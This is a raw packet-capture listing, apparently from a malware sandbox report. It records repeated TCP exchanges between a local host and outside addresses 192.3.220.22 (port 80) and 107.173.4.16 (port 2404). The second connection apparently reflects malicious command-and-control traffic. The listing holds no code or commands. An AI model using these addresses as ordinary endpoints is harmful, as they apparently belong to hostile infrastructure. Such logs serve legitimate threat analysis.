                                                                            Sep 30, 2024 09:56:15.155672073 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155685902 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155688047 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155699968 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155709028 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155709982 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155718088 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155725002 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155746937 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155747890 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155759096 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155760050 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155774117 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155777931 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155785084 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155795097 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155808926 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155811071 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155817986 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155824900 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155839920 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155843019 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155857086 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155859947 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155869961 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155872107 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155885935 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155886889 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155900955 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155910015 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155921936 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155926943 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155930996 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155941963 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155953884 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155956984 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155966043 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155972958 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155987978 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.155988932 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155999899 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156004906 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156016111 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156021118 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156035900 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156045914 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156056881 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156060934 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156064987 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156076908 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156089067 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156092882 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156102896 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156106949 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156119108 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156124115 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156138897 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156143904 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156160116 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156172037 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156172037 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156184912 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156189919 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156209946 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156218052 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156225920 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156233072 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156243086 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156250954 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156259060 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156270981 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156275034 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156290054 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156290054 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156299114 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156307936 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156317949 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156322002 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156331062 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156338930 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156352997 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156354904 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156366110 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156368971 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156383991 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156388044 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156399012 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156399012 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156414032 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156415939 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156430006 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156430960 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156449080 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156450033 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156461954 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156467915 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156482935 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156495094 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156497955 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156510115 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156512976 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156528950 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156528950 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156544924 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156548977 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156558990 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156560898 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156577110 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156584024 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156594038 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.156595945 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.156618118 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:20.756314039 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.756325006 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.756342888 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.756346941 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.756381035 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.756413937 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.756414890 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.756429911 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.756441116 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.756458998 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.756465912 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.756478071 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.756480932 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.756567955 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.757184029 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.757194996 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.757205963 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.757225990 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.757232904 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.757236958 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.757250071 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.757261992 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.757267952 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.757298946 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.757525921 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.757535934 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.757546902 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.757559061 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.757569075 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.757581949 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.757581949 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.757602930 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.757622004 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.758052111 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.758100033 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.758280993 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.758291960 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.758304119 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.758313894 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.758325100 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.758328915 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.758337975 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.758346081 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.758351088 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.758362055 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.758371115 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.758374929 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.758382082 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.758388042 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.758419037 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.760171890 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.760216951 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.760216951 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.761207104 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.761219025 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.761229992 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.761255026 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.761256933 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.761274099 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.761286020 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.761297941 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.761313915 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.761318922 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.761347055 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.761347055 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.761347055 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.762833118 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.762845993 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.762856007 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.762885094 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.762896061 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.762908936 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.762919903 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.762922049 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.762933016 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.762949944 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.762974024 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.762980938 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.762993097 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.763000011 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.763005018 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.763010025 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.763015985 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.763051987 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.791187048 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.841985941 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842020035 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842039108 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842072964 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842087030 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842098951 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842101097 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842113018 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842118025 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842133999 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842144012 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842149973 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842165947 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842176914 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842200994 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842209101 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842216969 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842233896 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842247963 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842263937 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842272997 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842278004 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842293024 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842297077 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842315912 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842346907 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842360973 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842376947 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842389107 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842417002 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842425108 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842438936 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842454910 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842467070 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842483044 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842483997 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842508078 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842530012 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842545986 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842572927 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842643023 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842668056 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842684031 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842691898 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842708111 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842725039 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842739105 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842740059 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842755079 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842765093 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842804909 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842817068 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842853069 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842869043 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842894077 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842917919 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842932940 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842956066 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842964888 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.842969894 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842978954 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.842993021 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843008041 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843008041 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.843024969 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843039989 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.843079090 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.843107939 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843210936 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843225956 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843240023 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843254089 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843259096 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.843276978 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.843278885 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843296051 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843312025 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843318939 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.843327045 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843344927 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843352079 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.843391895 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.843408108 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843422890 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843437910 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843453884 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843466997 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.843470097 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843494892 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.843494892 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843513012 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843527079 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843537092 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.843552113 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843565941 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843576908 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.843583107 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.843606949 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.844955921 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.847222090 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.847235918 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.847249985 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.847265959 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.847291946 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.847294092 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.847316980 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.847321033 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016392946 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016402006 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016416073 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016427040 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016436100 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016463995 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016527891 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016540051 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016551018 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016571999 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016602993 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016602993 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016618013 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016690016 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016921997 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016972065 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017009020 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017020941 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.017076969 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017122984 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.017131090 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017164946 CEST240449175107.173.4.16192.168.2.22
